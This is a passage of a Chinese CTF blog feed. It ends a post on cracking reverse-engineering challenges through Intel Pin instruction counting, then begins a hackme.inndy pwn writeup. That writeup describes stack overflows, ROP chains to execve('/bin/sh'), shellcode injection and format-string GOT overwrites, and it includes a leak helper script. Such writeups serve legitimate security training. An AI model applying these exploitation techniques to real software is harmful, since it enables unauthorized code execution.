class="o">(</span>182804<span class="o">)</span> -&gt; delta<span class="o">(</span>0<span class="o">)</span> input<span class="o">(</span>h???????<span class="o">)</span> -&gt; now<span class="o">(</span>182804<span class="o">)</span> -&gt; delta<span class="o">(</span>0<span class="o">)</span> input<span class="o">(</span>i???????<span class="o">)</span> -&gt; now<span class="o">(</span>182804<span class="o">)</span> -&gt; delta<span class="o">(</span>0<span class="o">)</span> input<span class="o">(</span>j???????<span class="o">)</span> -&gt; now<span class="o">(</span>182804<span class="o">)</span> -&gt; delta<span class="o">(</span>0<span class="o">)</span> input<span class="o">(</span>k???????<span class="o">)</span> -&gt; now<span class="o">(</span>182804<span class="o">)</span> -&gt; delta<span class="o">(</span>0<span class="o">)</span> input<span class="o">(</span>l???????<span class="o">)</span> -&gt; now<span class="o">(</span>182804<span class="o">)</span> -&gt; delta<span class="o">(</span>0<span class="o">)</span> input<span class="o">(</span>m???????<span class="o">)</span> -&gt; now<span class="o">(</span>182804<span class="o">)</span> -&gt; delta<span class="o">(</span>0<span class="o">)</span> input<span class="o">(</span>n???????<span class="o">)</span> -&gt; now<span class="o">(</span>182804<span class="o">)</span> -&gt; delta<span class="o">(</span>0<span class="o">)</span> input<span class="o">(</span>o???????<span class="o">)</span> -&gt; now<span class="o">(</span>182804<span class="o">)</span> -&gt; delta<span class="o">(</span>0<span class="o">)</span> input<span class="o">(</span>p???????<span class="o">)</span> -&gt; now<span class="o">(</span>182804<span class="o">)</span> -&gt; delta<span class="o">(</span>0<span class="o">)</span> input<span class="o">(</span>q???????<span class="o">)</span> -&gt; now<span class="o">(</span>182804<span class="o">)</span> -&gt; delta<span class="o">(</span>0<span class="o">)</span> ...... input<span class="o">(</span>AzI0wBsO<span class="o">)</span> -&gt; now<span class="o">(</span>211070<span class="o">)</span> -&gt; delta<span class="o">(</span>0<span class="o">)</span> input<span class="o">(</span>AzI0wBsP<span class="o">)</span> -&gt; now<span class="o">(</span>211069<span class="o">)</span> -&gt; delta<span class="o">(</span>-1<span class="o">)</span> input<span class="o">(</span>AzI0wBsQ<span class="o">)</span> -&gt; now<span class="o">(</span>211069<span class="o">)</span> -&gt; delta<span class="o">(</span>0<span class="o">)</span> input<span class="o">(</span>AzI0wBsR<span class="o">)</span> -&gt; now<span class="o">(</span>211069<span class="o">)</span> -&gt; delta<span class="o">(</span>0<span class="o">)</span> input<span class="o">(</span>AzI0wBsS<span class="o">)</span> -&gt; now<span class="o">(</span>211069<span class="o">)</span> -&gt; delta<span class="o">(</span>0<span class="o">)</span> input<span class="o">(</span>AzI0wBsT<span class="o">)</span> -&gt; now<span class="o">(</span>211069<span class="o">)</span> -&gt; delta<span class="o">(</span>0<span class="o">)</span> input<span class="o">(</span>AzI0wBsU<span class="o">)</span> -&gt; now<span class="o">(</span>211069<span class="o">)</span> -&gt; delta<span class="o">(</span>0<span class="o">)</span> input<span class="o">(</span>AzI0wBsV<span class="o">)</span> -&gt; now<span class="o">(</span>211069<span class="o">)</span> -&gt; delta<span class="o">(</span>0<span class="o">)</span> input<span class="o">(</span>AzI0wBsW<span class="o">)</span> -&gt; now<span class="o">(</span>211069<span class="o">)</span> -&gt; delta<span class="o">(</span>0<span class="o">)</span> input<span class="o">(</span>AzI0wBsX<span class="o">)</span> -&gt; now<span class="o">(</span>214976<span class="o">)</span> -&gt; delta<span class="o">(</span>3907<span class="o">)</span> Found pwd: AzI0wBsX python guessPWD.py 31.04s user 14.72s system 105% cpu 43.341 total </code></pre></td></tr></table> </div> </div><p>验证一下</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">NDH2k13-crackme-500 <span class="o">[</span>master●<span class="o">]</span> ./crackme Jonathan Salwan loves you &lt;<span class="m">3</span> ---------------------------- Password: AzI0wBsX Good password </code></pre></td></tr></table> </div> </div><p>这样，我们用不到 5 分钟的时间就猜出了 flag</p> <blockquote> <p>inscount1(BB级插桩) 与 inscount0(ins级插桩) 效果相同，但 inscount1 速度更快，实际解题时可以用 inscount1 代替 inscount0</p> </blockquote> <h3 id="hxpctf-2017-main_strip">hxpCTF-2017-main_strip</h3> <p>再以 hxpCTF2017 的一道题目演示改造 pintool 用于解题，我们着重演示改造 pintool 的步骤，因此恢复符号表和分析程序流程的部分可以参考这篇 <a href="http://eternal.red/2017/dont_panic-writeup/">writeup</a></p> <p>我们先尝试用上例的方法解这道题目</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">hxpCTF-2017-main_strip <span class="o">[</span>master●●<span class="o">]</span> ~/pin-3.6-gcc-linux/pin -t ./myInscount1.so -- ./main_strip a Nope. Count: <span class="m">517715</span> hxpCTF-2017-main_strip <span class="o">[</span>master●●<span class="o">]</span> ~/pin-3.6-gcc-linux/pin -t ./myInscount1.so -- ./main_strip a Nope. Count: <span class="m">545828</span> hxpCTF-2017-main_strip <span class="o">[</span>master●●<span class="o">]</span> ~/pin-3.6-gcc-linux/pin -t ./myInscount1.so -- ./main_strip a Nope. Count: <span class="m">532656</span> hxpCTF-2017-main_strip <span class="o">[</span>master●●<span class="o">]</span> ~/pin-3.6-gcc-linux/pin -t ./myInscount1.so -- ./main_strip a Nope. Count: <span class="m">524544</span> hxpCTF-2017-main_strip <span class="o">[</span>master●●<span class="o">]</span> ~/pin-3.6-gcc-linux/pin -t ./myInscount1.so -- ./main_strip a Nope. Count: <span class="m">582401</span> </code></pre></td></tr></table> </div> </div><p>很不幸，即使我们使用同一个输入，指令数也是有较大变化的，使用现有的 pintool 难以解出这道题目，我们进行更深一步的分析，验证 flag 的关键部分可以表示为如下代码</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span><span class="lnt">9 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-C" data-lang="C"><span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span><span class="o">=</span><span class="mi">0</span><span class="p">;</span> <span class="n">i</span><span class="o">&lt;</span><span class="n">length</span><span class="p">(</span><span class="n">provided_flag</span><span class="p">);</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span> <span class="k">if</span> <span class="p">(</span><span class="n">main_mapanic</span><span class="p">(</span><span class="n">provided_flag</span><span class="p">[</span><span class="n">i</span><span class="p">])</span> <span class="o">!=</span> <span class="n">constant_binary_blob</span><span class="p">[</span><span class="n">i</span><span class="p">])</span> <span class="p">{</span> <span class="n">bad_boy</span><span class="p">();</span> <span class="n">exit</span><span class="p">();</span> <span class="p">}</span> <span class="n">goodboy</span><span class="p">();</span> <span class="p">}</span> </code></pre></td></tr></table> </div> </div><p>可以看出判断相等是逐位进行的，因此可以考虑对 inscount0 的 docount 函数做如下更改</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span><span class="lnt">9 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-C" data-lang="C"><span class="err">更改前：</span> <span class="n">VOID</span> <span class="n">docount</span><span class="p">()</span> <span class="p">{</span> <span class="n">icount</span><span class="o">++</span><span class="p">;</span> <span class="p">}</span> <span class="err">更改后：</span> <span class="n">VOID</span> <span class="n">docount</span><span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="n">ip</span><span class="p">)</span> <span class="p">{</span> <span class="c1">// .text:000000000047B96E cmp al, cl; cmp mapanic(provided_flag[i]), constant_binary_blob[i] </span><span class="c1"></span> <span class="k">if</span> <span class="p">((</span><span class="kt">long</span> <span class="kt">long</span> <span class="kt">int</span><span class="p">)</span><span class="n">ip</span> <span class="o">==</span> <span class="mh">0x000000000047B96E</span><span class="p">)</span> <span class="n">icount</span><span class="o">++</span><span class="p">;</span> <span class="p">}</span> </code></pre></td></tr></table> </div> </div><p>只有运行到 0x47B96E 一句才会计数，这样我们就可以根据 pintool 的结果来逐位爆破 flag 了</p> <blockquote> <p>然而，因为该题目的指令较多，指令级别的插桩会耗费较长时间，需要1h左右才能得到 flag</p> </blockquote> <p>##　总结</p> <ul> <li>使用 intel pin 可以解一部分 CTF challenges，尤其是虚拟机或者混淆严重的逆向题目，但 pin 的用途绝不局限于求解 CTF challenges</li> <li>使用 pin 可以解一部分 CTF 题目，但也仅仅是一部分题目，多数题目由于插桩代价大，难以提取侧信道信息，pintool 难以编写等原因使用 pin 求解得不偿失，因此使用 pin 求解 CTF challenges 可以总结为下条原则： <ul> <li>能用血赚，凉了不亏</li> </ul> </li> </ul> <h2 id="reference">Reference</h2> <ul> <li><a href="http://shell-storm.org/blog/A-binary-analysis-count-me-if-you-can/">http://shell-storm.org/blog/A-binary-analysis-count-me-if-you-can/</a></li> <li><a href="http://brieflyx.me/2017/binary-analysis/intel-pin-intro/">http://brieflyx.me/2017/binary-analysis/intel-pin-intro/</a></li> <li><a href="http://eternal.red/2017/dont_panic-writeup/">http://eternal.red/2017/dont_panic-writeup/</a></li> <li><a href="https://github.com/M4xW4n9/slides/blob/master/auto/04-PinTutorial.pdf">https://github.com/M4xW4n9/slides/blob/master/auto/04-PinTutorial.pdf</a></li> </ul> https://bash-c.github.io/post/hackme.inndy-writeup/ Tue, 03 Jul 2018 12:01:48 +0800 https://bash-c.github.io/post/hackme.inndy-writeup/ <p>推荐一下<a href="https://hackme.inndy.tw/scoreboard/">hackme.inndy</a>，上边有一些很好的针对新手的题目，但网上能搜到的Writeup很少，因此开了这篇博文记录一下部分目前解出的题目（主要是pwn和re），以后会跟着解题进度的推进逐步更新，同时遵循inndy师傅的规矩，只放思路，不放flag。</p> <blockquote> <p><del>zwhubuntu师傅的部分题解：http://wxzwhubuntu.club:8088/index.php/2017/06/14/inndy/</del></p> <p>聂师傅的部分题解: <a href="http://blog.csdn.net/niexinming">http://blog.csdn.net/niexinming</a></p> <p>如果看了解题思路仍有问题，可以在我的github找到完整的脚本：<a href="https://github.com/M4xW4n9/pwn_repo">pwn</a>，<a href="https://github.com/M4xW4n9/reverse_repo">reverse</a>，欢迎star和follow</p> </blockquote> <h2 id="pwn">pwn</h2> <h3 id="0x00-catflag">0x00 catflag</h3> <p>送分题，nc连接，cat flag即可</p> <h3 id="0x01-homework">0x01 homework</h3> <p>根据题目提示，是数组越界的漏洞，第一次遇到这种漏洞觉得利用方式很巧妙。通过搜索字符串发现了get shell的函数<strong>call_me_maybe</strong>, <strong>run_program</strong>函数中定义了一个大小为10的数组，漏洞出现在<strong>edit number</strong>的选项里，当我们输入的<strong>index</strong>大于10时，程序是不会报错的，而是会继续朝着高地址<strong>edit</strong>数据，因此只需要<strong>edit</strong> <strong>run_program</strong>栈中的<strong>ret</strong>为<strong>call_me_maybe</strong>, 这样当我们退出<strong>run_program</strong>函数时，程序就会返回到<strong>call_me_maybe</strong>函数来<strong>get_shell</strong>，原理图如下：</p> <p><img src="https://ws1.sinaimg.cn/large/006AWYXBly1fkq1tczbi3j30ou0lct8t.jpg" alt=""></p> <blockquote> <p>有两点需要注意：</p> </blockquote> <blockquote> <ol> <li>因为edit number中修改的数据是通过**%d**输入的，因此需要以整形的方式输入**call_me_maybe**函数的地址</li> <li>修改ret的地址之后，还需要再输入一次0来退出<strong>run_program</strong>的循环来出发ret</li> </ol> </blockquote> <p><strong>payload：</strong></p> <p><img src="https://ws1.sinaimg.cn/large/006AWYXBly1fkq1yrw26jj30bo0360st.jpg" alt=""></p> <h3 id="0x02-rop">0x02 ROP</h3> <p>刚看这道题的时候觉得无从下手，程序中既没有可以利用的函数，通过file命令查看是静态链接的也不能利用libc中的函数。后来注意到下一题提到了<strong>ROPgadget</strong>这个工具，才想到可以直接利用<strong>ROPgadget</strong>直接拼凑出ROP链，如下：</p> <p><img src="https://ws1.sinaimg.cn/large/006AWYXBly1fkq254tf1vj30lg02nwgm.jpg" alt=""></p> <p>这样就只需要我们通过缓冲区溢出的漏洞返回到ROPgadget构造的ropchain就可以了</p> <p><strong>payload</strong>:</p> <p><img src="https://ws1.sinaimg.cn/large/006AWYXBly1fkq26rjlowj30a603yglr.jpg" alt=""></p> <h3 id="0x03-rop2">0x03 ROP2</h3> <p>本来根据提示以为这道题需要自己拼凑出ropchain，但后来发现这一题中存在<strong>syscall</strong>这个可以实现系统调用的函数，如<strong>syscall(4, 1, &amp;v4, 42)<strong>即相当于</strong>write(1, &amp;v4, 42)</strong>，<strong>syscall(3, 0, &amp;v1, 1024)<strong>即相当于</strong>read(0, &amp;v1, 1024)</strong>，syscall的第一个参数是系统函数的系统调用号，之后的参数依次为对应函数的参数，32位的系统调用号定义在**/usr/include/x86_64-linux-gnu/asm/unistd_32.h**中，可以看到execve的调用号为11，因此如果我们构造**syscall(11, &ldquo;/bin/sh&rdquo;, 0, 0)**就相当于执行了**execve(&quot;/bin/sh&rdquo;, 0, 0)**即可get shell</p> <blockquote> <p>介绍一个小trick，如下图，可以看出v4是提示字符串的开头，但因为IDA没有正确识别变量的类型，把提示字符串分成了v4~v15多个变量，v4的地址为bp-0x33，v15为bp-0x9，因此字符串长度为0x33 - 0x9 = 42</p> <p><img src="https://ws1.sinaimg.cn/large/006AWYXBly1fkq2myq7umj308706za9w.jpg" alt=""></p> <p>这时我们在v4上<strong>y</strong>一下，然后在弹出来的窗口上填入我们推断出来的数据类型<strong>char v4[42]</strong>，再点OK，这时IDA就能正确的识别出来v4的数据类型了，如下图：</p> <p><img src="https://ws1.sinaimg.cn/large/006AWYXBly1fkq2rbv7znj30ig01zwea.jpg" alt=""></p> </blockquote> <p><strong>payload1:</strong></p> <p>通过两次rop，实现get shell</p> <p><img src="https://ws1.sinaimg.cn/large/006AWYXBly1fkq2t89z2ij30rl06zmy7.jpg" alt=""></p> <p><strong>payload2:</strong></p> <p>利用ROPgadget找到了一个pop4ret的gadget，利用pop4ret平衡堆栈，用一个ropchain实现getshell</p> <p><img src="https://ws1.sinaimg.cn/large/006AWYXBly1fkq2t89z2ij30rl06zmy7.jpg" alt=""></p> <p>需要注意，对于execve的第一个参数&rdquo;/bin/sh&rdquo;，我们可以用先写入一个固定地址（如bss段）的方式迂回传参。</p> <h3 id="0x04-toooomuch">0x04 toooomuch</h3> <p>放松心情的题，用IDA很容易可以得到通过验证的passcode，然后用 二分/XJB猜 猜对数字后，就可以拿到flag</p> <h3 id="0x05-toooomuch-2">0x05 toooomuch-2</h3> <p>题目已经提示利用缓冲区溢出通过shellcode来get shell，IDA查看程序流程，在gets函数中存在溢出</p> <p><img src="https://ws1.sinaimg.cn/large/006AWYXBly1fkq3gdiy7cj30cy03pa9v.jpg" alt=""></p> <p>这样只要把通过ROP把shellcode写到bss段，再返回bss段执行shellcode即可</p> <p><strong>payload:</strong></p> <p><img src="https://ws1.sinaimg.cn/large/006AWYXBly1fkq3osfqpjj30jy03emxl.jpg" alt=""></p> <h3 id="0x06-echo">0x06 echo</h3> <p>看到echo，第一反应就是格式化字符串的题，分析文件后果然发现了很明显的格式化字符串漏洞</p> <p><img src="https://ws1.sinaimg.cn/large/006AWYXBly1fkq3sgwpojj30d6038743.jpg" alt=""></p> <p>并且可以通过while循环多次利用，很经典的利用方式，先泄露出system_got中的system函数真实地址，再覆写printf_got为system_addr，之后通过fgets读入&rdquo;/bin/sh&quot;时，printf(&quot;/bin/sh&rdquo;)已经相当于system(&quot;/bin/sh&rdquo;)，即可get shell</p> <p><strong>payload:</strong></p> <p><img src="https://ws1.sinaimg.cn/large/006AWYXBly1fkq3w63laqj30gi070js5.jpg" alt=""></p> <blockquote> <p>需要注意如果leak的payload是<strong>p32(system_got) + &ldquo;%7$s&rdquo;<strong>的形式，那么泄露出的system_addr是从第4位到第8位（p32(system_got))占据了前4位，另外如果p32(system_got)中有\x00等bad char截断printf的话，可以调整payload形式为</strong>%8$s + p32(system_got)</strong></p> </blockquote> <h3 id="0x07-echo2">0x07 echo2</h3> <p>很明显这一题也是格式化字符串的漏洞,与上一题的不同在于:</p> <ol> <li>64位,这意味着fmtstr_payload函数极有可能因为\x00不能用</li> <li>开启了PIE,也就是说got表等地址都是随机的,但因为elf中各个部分的偏移是固定的,因此可以通过泄露elf基址的方法来确定其他部分的真实地址</li> </ol> <p>通过调试看出可以利用%41$p和%43$p泄露main地址与__libc_start_main的地址(0x23 + 6, 0x25 + 6):</p> <p><img src="https://ws1.sinaimg.cn/large/006AWYXBly1fnn6mkc4gxj30vr0b3k0g.jpg" alt=""></p> <p>泄露elf_base与libc_base的函数如下:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-python" data-lang="python"><span class="k">def</span> <span class="nf">getAddr</span><span class="p">():</span> <span class="n">io</span><span class="o">.</span><span class="n">sendline</span><span class="p">(</span><span class="s2">&#34;%41$p..%43$p..&#34;</span><span class="p">)</span> <span class="n">elf_base</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">io</span><span class="o">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="s2">&#34;..&#34;</span><span class="p">,</span> <span class="n">drop</span> <span class="o">=</span> <span class="bp">True</span><span class="p">),</span> <span class="mi">16</span><span class="p">)</span> <span class="o">-</span> <span class="mi">74</span> <span class="o">-</span> <span class="mh">0x9b9</span><span class="c1">#nm ./echo2</span> <span class="n">libc_base</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">io</span><span class="o">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="s2">&#34;..&#34;</span><span class="p">,</span> <span class="n">drop</span> <span class="o">=</span> <span class="bp">True</span><span class="p">),</span> <span class="mi">16</span><span class="p">)</span> <span class="o">-</span> <span class="mi">240</span> <span class="o">-</span> <span class="n">libc_offset</span> <span class="c1"># this is for remote</span> <span class="c1"># libc_base = int(io.recvuntil(&#34;..&#34;, drop = True), 16) - 241 - libc_offset #this is for local</span> <span class="n">log</span><span class="o">.</span><span class="n">info</span><span class="p">(</span><span class="s2">&#34;elf_base -&gt; 0x</span><span class="si">%x</span><span class="s2">&#34;</span> <span class="o">%</span> <span class="n">elf_base</span><span class="p">)</span> <span class="n">log</span><span class="o">.</span><span class="n">info</span><span class="p">(</span><span class="s2">&#34;libc_base -&gt; 0x</span><span class="si">%x</span><span class="s2">&#34;</span> <span class="o">%</span> <span class="n">libc_base</span><span class="p">)</span> <span class="k">return</span> <span class="n">elf_base</span> <span class="o">+</span> <span class="n">exit_got</span><span class="p">,</span> <span class="n">libc_base</span> <span class="o">+</span> <span class="n">one_gadget</span> </code></pre></td></tr></table> </div> </div><p>获得elf_base与libc_base基址后,按照正常的格式化字符串思路来就行,比如可以用one_gadget地址覆写exit函数的got表地址.</p> <h3 id="0x08-echo3">0x08 echo3</h3> <p>漏洞和逻辑都很简单, 非栈区的格式化字符串利用, 利用方式可以参考 <a href="http://m4x.fun/post/hitcon-training-writeup/">hitcon-training 的 lab9</a>, 那道题里我把调试的过程也放到代码里了, 比较容易看清楚逻辑 同时这道题有一个随机数来打乱栈的布局, 导致我们没办法确定每次格式化字符串的 offset, 但仔细观察后发现随机数只有几个, 可以通过爆破的方法来确定</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-python" data-lang="python"><span class="n">inndy_echo3</span> <span class="p">[</span><span class="n">master</span><span class="err">●</span><span class="p">]</span> <span class="n">cat</span> <span class="n">rand</span><span class="o">.</span><span class="n">py</span> <span class="c1">#!/usr/bin/env python</span> <span class="c1"># -*- coding: utf-8 -*-</span> <span class="n">__Auther__</span> <span class="o">=</span> <span class="s1">&#39;M4x&#39;</span> <span class="n">f</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">x</span><span class="p">:</span> <span class="mi">16</span> <span class="o">*</span> <span class="p">(((</span><span class="n">x</span> <span class="o">&amp;</span> <span class="mh">0x3039</span><span class="p">)</span> <span class="o">+</span> <span class="mi">30</span><span class="p">)</span> <span class="o">/</span> <span class="mh">0x10</span><span class="p">)</span> <span class="n">allrand</span> <span class="o">=</span> <span class="p">[]</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">xrange</span><span class="p">(</span><span class="mh">0xffff</span><span class="p">):</span> <span class="n">allrand</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="n">f</span><span class="p">(</span><span class="n">i</span><span class="p">))</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">set</span><span class="p">(</span><span class="n">allrand</span><span class="p">):</span> <span class="k">print</span> <span class="s2">&#34;{:#x}</span><span class="se">\t</span><span class="s2">{}</span><span class="se">\t</span><span class="s2">{}&#34;</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">i</span><span class="p">,</span> <span class="n">allrand</span><span class="o">.</span><span class="n">count</span><span class="p">(</span><span class="n">i</span><span class="p">),</span> <span class="nb">float</span><span class="p">(</span><span class="n">allrand</span><span class="o">.</span><span class="n">count</span><span class="p">(</span><span class="n">i</span><span class="p">))</span> <span class="o">/</span> <span class="nb">sum</span><span class="p">(</span><span class="nb">set</span><span class="p">(</span><span class="n">allrand</span><span class="p">)))</span> <span class="n">inndy_echo3</span> <span class="p">[</span><span class="n">master</span><span class="err">●</span><span class="p">]</span> <span class="n">python</span> <span class="n">rand</span><span class="o">.</span><span class="n">py</span> <span class="mh">0x20</span> <span class="mi">4096</span> <span class="mf">0.0330749354005</span> <span class="mh">0x1010</span> <span class="mi">2048</span> <span class="mf">0.0165374677003</span> <span class="mh">0x1050</span> <span class="mi">2048</span> <span class="mf">0.0165374677003</span> <span class="mh">0x1030</span> <span class="mi">4096</span> <span class="mf">0.0330749354005</span> <span class="mh">0x2010</span> <span class="mi">2048</span> <span class="mf">0.0165374677003</span> <span class="mh">0x30</span> <span class="mi">4096</span> <span class="mf">0.0330749354005</span> <span class="mh">0x50</span> <span class="mi">2048</span> <span class="mf">0.0165374677003</span> <span class="mh">0x40</span> <span class="mi">4096</span> <span class="mf">0.0330749354005</span> <span class="mh">0x3050</span> <span class="mi">2047</span> <span class="mf">0.0165293927649</span> <span class="mh">0x3010</span> <span class="mi">2048</span> <span class="mf">0.0165374677003</span> <span class="mh">0x2020</span> <span class="mi">4096</span> <span class="mf">0.0330749354005</span> <span class="mh">0x1040</span> <span class="mi">4096</span> <span class="mf">0.0330749354005</span> <span class="mh">0x1020</span> <span class="mi">4096</span> <span class="mf">0.0330749354005</span> <span class="mh">0x3020</span> <span class="mi">4096</span> <span class="mf">0.0330749354005</span> <span class="mh">0x10</span> <span class="mi">2048</span> <span class="mf">0.0165374677003</span> <span class="mh">0x2040</span> <span class="mi">4096</span> <span class="mf">0.0330749354005</span> <span class="mh">0x3030</span> <span class="mi">4096</span> <span class="mf">0.0330749354005</span> <span class="mh">0x3040</span> <span class="mi">4096</span> <span class="mf">0.0330749354005</span> <span class="mh">0x2050</span> <span class="mi">2048</span> <span class="mf">0.0165374677003</span> <span class="mh">0x2030</span> <span class="mi">4096</span> <span class="mf">0.0330749354005</span> </code></pre></td></tr></table> </div> </div><p>同时本地可以使用 gdb.debug() 来指定随机数方便本地调试, 具体的实现可以参考我的 <a href="https://github.com/0x01f/pwn_repo/blob/master/inndy_echo3/exp.py">exp</a> 拿到 flag 后与站主交流, 发现我用了非预期解, 也贴一下站主的 <a href="https://github.com/0x01f/pwn_repo/blob/master/inndy_echo3/inndy_exp.py">exp</a></p> <h3 id="0x09-smash-the-stack">0x09 smash-the-stack</h3> <p>典型的canary leak，覆盖__libc_argv[0]为flag在内存中地址，触发__stack_chk_fail函数即可泄露flag</p> <p>放一篇学习链接:http://veritas501.space/2017/04/28/%E8%AE%BAcanary%E7%9A%84%E5%87%A0%E7%A7%8D%E7%8E%A9%E6%B3%95/</p> <p><strong>payload:</strong></p> <p><img src="https://ws1.sinaimg.cn/large/006AWYXBly1flhvskji94j30do00zt8l.jpg" alt=""></p> <p>或者可以用更暴力的方法,不计算argv[0]到缓冲区的距离,用一个较大的值直接覆盖过去即可:</p> <p><strong>payload:</strong></p> <p><img src="https://ws1.sinaimg.cn/large/006AWYXBly1fm3h8o1x9bj30cw00xq30.jpg" alt=""></p> <blockquote> <p>需要注意的是write函数的长度是由用户输入决定的，给buf一个较小的值即可</p> </blockquote> <h3 id="0x0a-onepunch">0x0A onepunch</h3> <blockquote> <p>本来以为onepunch的意思是构造好payload一发get shell， 后来才发现是一个字节一个字节的打</p> </blockquote> <p>题中有一个任意地址写一个字节的漏洞，刚开始觉得无从下手，后来调试的时候发现代码段为rwxp权限，才觉得柳暗花明。</p> <p><img src="https://ws1.sinaimg.cn/large/006AWYXBly1fnt5r9gmg0j30r80h149o.jpg" alt=""></p> <p>既然可以在代码段任意地址写，就意味着我们可以为所欲为的修改代码流程，因此就可以将</p> <blockquote> <p>.text:0000000000400767 jnz short loc_400773</p> </blockquote> <p>修改为</p> <blockquote> <p>.text:0000000000400767 jnz 0x40071D</p> </blockquote> <p>这样就构成了一个循环，接下来在合适的位置写shellcode，然后跳转到shellcode即可</p> <p><strong>payload：</strong></p> <p><img src="https://ws1.sinaimg.cn/large/006AWYXBly1fnt61kw6nyj30k809tn1v.jpg" alt=""></p> <blockquote> <p>至于怎么确定要patch的地址和值，我推荐keypatch，用keypatch修改完伪代码后，通过将 　<em>Options -&gt; General -&gt;Number of Opcode byte</em>修改为非０值对比修改前后的字节码即可</p> <p><img src="https://ws1.sinaimg.cn/large/006AWYXBly1fnt641x5hij30i20c1t95.jpg" alt=""></p> <p><img src="https://ws1.sinaimg.cn/large/006AWYXBly1fnt64pqggxj30tc0chq39.jpg" alt=""></p> </blockquote> <h3 id="0x0b-rsbo">0x0B rsbo</h3> <p>这道题的利用方法倒是第一次见到，对于read和write的第一个参数fd（文件描述符），fd = 0时代表标准输入stdin，1时代表标准输出stdout，2时代表标准错误stderr，<strong>3~9则代表打开的文件</strong>。这一题的利用方式利用方式就是利用rop先用open函数打开位于/home/rsbo/的flag，然后再用read(3, )把flag写到一个固定地址上，最后用write输出</p> <p><strong>payload:</strong></p> <p><img src="https://ws1.sinaimg.cn/large/006AWYXBly1fkq4vt2qwfj30so0800ty.jpg" alt=""></p> <h3 id="0x0c-rsbo-2">0x0C rsbo-2</h3> <p>和 rsbo-1 完全一样, 这次要 get shell 了, 也很简单, binary 中有 write@plt, 因此可以通过 rop 来 leak write@got 等函数, 进而确定 libc.address, 然后再来一次 rop 执行 system(&quot;/bin/sh&rdquo;) 就行了 因为远程端口也是一样的, 因此直接做 rsbo-2 即可</p> <blockquote> <p>这道题是回头又看的, 以前居然因为这种难度的题卡了那么久= =</p> </blockquote> <h3 id="0x0d-leave_msg">0x0D leave_msg</h3> <p>经过分析代码的逻辑,绕过下边的限制,就可以覆写got表:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-c" data-lang="c"><span class="k">if</span> <span class="p">(</span> <span class="n">v4</span> <span class="o">&lt;=</span> <span class="mi">64</span> <span class="o">&amp;&amp;</span> <span class="n">nptr</span> <span class="o">!=</span> <span class="mi">45</span> <span class="p">)</span> <span class="n">dword_804A060</span><span class="p">[</span><span class="n">v4</span><span class="p">]</span> <span class="o">=</span> <span class="p">(</span><span class="kt">int</span><span class="p">)</span><span class="n">strdup</span><span class="p">(</span><span class="o">&amp;</span><span class="n">buf</span><span class="p">);</span> </code></pre></td></tr></table> </div> 